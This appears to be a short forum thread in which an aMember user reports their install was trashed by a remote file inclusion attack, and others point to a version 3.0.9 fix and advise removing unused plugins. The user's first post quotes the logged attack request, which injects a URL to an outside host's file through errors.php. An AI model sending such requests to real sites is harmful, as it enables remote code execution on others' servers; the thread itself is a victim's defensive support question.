My aMember install was recently trashed by a RFI attack. amember/signup.php///amember/plugins/payment//errors.php?error=http://www.csj-ath.be/medias/media.prt??? 200 This trashed the amember install and required a restore from our host. Our version is around a year old (perhaps more?) Has this vunerability been fixed?
What was the version number- v3.1.4 is up now. I think that was fixed with 3.0.9 http://www.amember.com/p/Main/SecurityNote04 David
Another suggestion is to ensure you have deleted all plugins from your server that you are not using.
3.08 And the suggested .htaccess file is already there, but it is not working correctly. We were never informed of the 3.09 security fix.